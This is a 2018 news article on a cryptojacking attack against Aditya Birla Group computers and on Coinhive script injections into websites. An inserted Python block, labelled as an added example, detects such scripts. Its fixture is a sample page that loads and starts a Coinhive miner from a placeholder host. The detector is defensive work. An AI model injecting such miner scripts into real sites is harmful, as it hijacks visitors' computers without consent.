Cryptojacking Malware Infected Over 2000 Aditya Birla Group Computers Last Month

May 11 2018

With the rise of cryptocurrencies, crypto-crime is rising too. Hackers are making use of cryptojacking - a technique in which malware mines for cryptocurrencies on an unsuspecting user’s computer. In one of the largest cryptojacking attacks in India, over 2000 computers across various companies of the Aditya Birla Group were affected by cryptojacking malware.

Reports from the Economic Times indicate that the attack was first noticed about a month ago, in an overseas subsidiary of the Aditya Birla Group, and then began to spread across the company’s network. Since it was detected, the company’s internal security team has been investigating and trying to stop the attack, and has managed to limit the spread of the malware. A statement sent to ET reads:

“Aditya Birla Group has advance threat management systems that are constantly monitoring and protecting business critical applications and infrastructure in all Businesses. Recently, the advance threat detection systems of our Group alerted us of suspicious activity on some desktop systems. Based on this, our internal team immediately carried out an investigation and deployed countermeasures to isolate and eliminate the cause of this activity.”

Aditya Birla Group is one of the biggest business houses in India and operates several businesses. This is the first organized cryptojacking attack on an Indian company - and at such a large scale too.

Cryptojacking in India

While this is the first attack of this scale targeted at an Indian firm, it is certainly not the first cryptojacking incident in the country. The e-newspaper websites of the Deccan Chronicle and the Asian Age - two popular newspapers from India - were also affected by the Coinhive cryptojacking script, which mined for cryptocurrencies using the processing power of their visitors’ computers.

Understanding Cryptojacking

Cryptojacking is a new-age cyber-crime where the intention of the hackers is not to steal data or to damage the user’s computer - instead, the hackers make use of the processing power of the CPU of the affected users to mine for cryptocurrencies - usually Monero. On most occasions, these attacks are not isolated incidents but affect a large number of computers at once. 

Cryptojacking incidents have risen markedly. Cryptojacking can be performed either by spreading malware which installs itself on a computer and mines for cryptocurrencies, or by injecting a cryptocurrency mining script into a website (usually the Coinhive script).
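A defender-side check for the script-injection route described above, as an added example that is not part of the original article: it parses a page's HTML and flags script tags that load or start a Coinhive-style miner. The marker strings, the function name `find_miner_scripts` and the sample pages are assumptions made for illustration.

```python
from html.parser import HTMLParser

# Assumed markers (not from the article): the Coinhive library file name and
# the JavaScript constructors a page used to create a miner object.
SRC_MARKERS = ("coinhive.min.js", "coinhive.com/")
INLINE_MARKERS = ("coinhive.anonymous(", "coinhive.user(")

class ScriptCollector(HTMLParser):
    """Collects external script URLs and inline script bodies from a page."""
    def __init__(self):
        super().__init__()
        self.sources, self.inline = [], []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)

def find_miner_scripts(html):
    """Return (kind, evidence) findings for scripts that match a marker."""
    collector = ScriptCollector()
    collector.feed(html)
    collector.close()  # flush any text still buffered by the parser
    findings = []
    for src in collector.sources:
        if any(m in src.lower() for m in SRC_MARKERS):
            findings.append(("external", src))
    for body in collector.inline:
        # Lower-case and drop spaces so "CoinHive . Anonymous (" still matches.
        if any(m in body.lower().replace(" ", "") for m in INLINE_MARKERS):
            findings.append(("inline", body.strip()[:60]))
    return findings

# Constructed sample pages; example.test and SITE_KEY are placeholders.
INFECTED = """<html><body><h1>e-paper</h1>
<script src="https://example.test/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY');</script>
</body></html>"""
CLEAN = '<html><body><script src="/js/site.js"></script></body></html>'
```

String markers only catch unobfuscated inclusions, so a match is a reason to investigate and an empty result is not proof that a page is clean.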

Cryptojacking has become increasingly common - even the likes of YouTube were affected when someone injected Coinhive code into a YouTube ad. Thousands of websites of the UK government were affected by it - and some even suspected that the government of Egypt was using a cryptojacking attack on its own citizens! Reports from March indicated that over 50,000 websites are currently affected by this issue.

With organizations such as the Aditya Birla Group now in the crosshairs of the hackers, business houses around the world need to ramp up their security to ensure they stay protected. 
